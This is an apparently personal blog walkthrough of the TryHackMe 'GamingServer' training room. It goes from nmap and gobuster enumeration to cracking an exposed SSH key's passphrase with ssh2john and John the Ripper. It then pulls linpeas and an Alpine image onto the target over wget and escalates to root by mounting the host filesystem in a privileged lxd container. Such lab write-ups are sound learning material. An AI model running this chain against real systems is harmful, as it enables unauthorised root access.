Try Hack Me: GamingServer

The skills to be tested and needed to solve this room are: nmap, GoBuster, lxd, privilege escalation, local web server, ssh2john, and John.

This room was released on 8/30/2020. The initial foothold to me was super easy, but I struggled with the privilege escalation in exploiting lxd. I was really excited because in one of the rooms (I don’t exactly remember which one it was), I got stuck in a rabbit hole trying to exploit lxd, but it was actually not exploitable on that particular machine. I was excited this time, because I know that lxd is the way to privesc and this will be the first for me. I got stuck in this room too because of a silly misspelling.

I also chose to mask part of the answers so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.

Shoutout to the room creator, @SuitGuy. You can access the room at https://tryhackme.com/room/gamingserver

I was assigned a victim IP address of 10.10.200.23 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.

The requirements to complete this room are:

  1. user.txt
  • a******************************e

2. root.txt

  • 2******************************c

Steps:

  1. Scan the target machine using nmap. Type nmap -sC -sV -oA gaming 10.10.200.23
  • -sC – to scan using the default nmap scripts
  • -sV – to pull version information of open ports found during the scan
  • -oA gaming – to save the results of the scan to a files named “gaming” and saved in three different formats (normal, XML, and grepable)
Opened ports are 22 and 80

2. Check the webserver by opening a browser and type your target’s IP address. Then check the webpage’s source code by right-clicking the page and choose View Page Source.

To access the page source code
  • Scroll all the way down, and you will see a message at the end of the page. The message sounds like user john could be a web developer
Message in a comment

3. Run GoBuster or your choice of web enumeration tool. Type gobuster dir -u http://10.10.200.23 -w /usr/share/wordlists/dirb/common.txt

  • dir – to use directory/file brute-forcing mode
  • -u – is the flag to tell gobuster that we are scanning a URL
  • -w – is the flag to set the list of possible directory and file names
Interesting file and directories found: robots.txt, secret and uploads
  • Check all of them by appending the filename or directory name on the url
robots.txt file
Content of the secret directory
Contents of the uploads directory
  • Check what the contents of the files secretKey and dict.lst
SSH Private Key is inside the secretKey file
Looks like a list of passwords inside the dict.lst file

4. Now that we have a private key, we have to convert it to a format where John the Ripper will be able to crack the passphrase to eventually login to SSH. To convert it a John The Ripper crackable file, we have to use ssh2john. Type python /usr/sharejohn/ssh2john.py id_rsa > gaming.txt

  • id_rsa – is the private key we recovered from the secretKey file. I just renamed it to id_rsa
  • gaming.txt – is the filename I chose as the output file after the conversion. You can use any filename
gaming.txt content

5. Let’s crack hash to obtain the SSH Private Key passphrase by using John the Ripper. Type /usr/sbin/john –wordlist=dict.lst gaming.txt

  • –wordlist – to instruct John the Ripper to use your preferred wordlist. Here we are using the list of passwords we obtained from the uploads directory
  • gaming.txt – is the hash we got from the SSH Private Key
Passphrase found!

6. Login through SSH using the SSH Private Key we found, the passphrase we cracked, and the username of john. Type ssh -i id_rsa john@10.10.200.23 then enter the passphrase we recovered on step 5.

Initial foothold
We are user John

7. To find the location of the user flag. Type find / -name user.txt 2>/dev/null

user.txt location

8. Open the user.txt file by typing cat /home/john/user.txt

User flag!

9. Check for any sudo privileges for user john by typing sudo -l

Nothing here

10. We have to enumerate more to find something to exploit to escalate our privilege. Use Linpeas.sh. You can download it here. Download linpeas.sh to your local attack machine (I am using kali). Then we will transfer linpeas.sh from our kali machine to our victim machine. Follow the steps below:

  • Start a local web server on your attack machine. Make sure to start it inside the directory where the linpeas.sh is located. For me it is located in the /home/kali/TryHackMe/gaming directory. Start the web server by typing python -m http.server 8000

***please note that the command I used python3 -m http.server only works if you are using python3 on your attack machine. For python2 you have to use python -m SimpleHTTPServer***

Python3 web server

***Make sure to match the port number from the port number you used when you started your web server, or else the download to the target machine will fail***

Linpeas.sh download was successful

11. Change the permission so you can execute linpeas by typing chmod +x linpeas.sh

Linpeas.sh is now executable

12. Run linpeas.sh to start enumerating by typing ./linpeas.sh

Linpeas is now running.
  • We can see that lxd is highlighted by linpeas and if we check which groups user john is a member, type groups john

13. We are going to exploit lxd and use it to escalate our privilege to root. By doing a quick research, like googling “how to escalate privilege using lxd” This page caught my attention. I followed the steps on how to exploit linux containers.

14. Download the script to create Alpine linux images from this page. Make sure to move the downloaded file in to the directory where you have your local web server started so you don’t have to start the server again. Now, go to the victim machine to download the script. Type wget http://Your_Attack_Machine_IP_Address:8000/alpine-v3.12-x86_64-20200830_2003.tar.gz

Alpine image builder script successfully transferred

15. Type lxc image import ./alpine-v3.12-x86_64-20200830.tar.gz –alias gaming

  • –alias gaming – you can choose your own alias, I used gaming.

16. Now, check any available images on the victim machine. Type lxc image list

17. Create a container using the gaming image by typing lxc init gaming thm -c security.privileged=true

  • lxc init – initialize container
  • gaming – is the image we are using to create the container
  • thm – is the name of the container
  • security.privileged=true – we want the container to have a uid=0 which is also the uid of the root on the host machine
Container thm has been created

18. Map the path by typing lxc config device add thm gaming disk source=/ path=/mnt/root recursive=true

Mapped

19. Start the container by typing lxc start thm

Container started

20. Execute a shell by typing lxc exec thm /bin/sh

We are user Root!

21. Search for the root.txt file by typing find / -name “root.txt”

Root flag location

22. Open the file to retrieve the root flag by typing cat /mnt/root/root/root.txt

Got the root flag!
Room completed!

Hope you enjoyed it. Please don’t forget to subscribe to my blog!

Published by lightkunyagami

https://tryhackme.com/badge/18276

Join the Conversation

1 Comment

Leave a comment

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: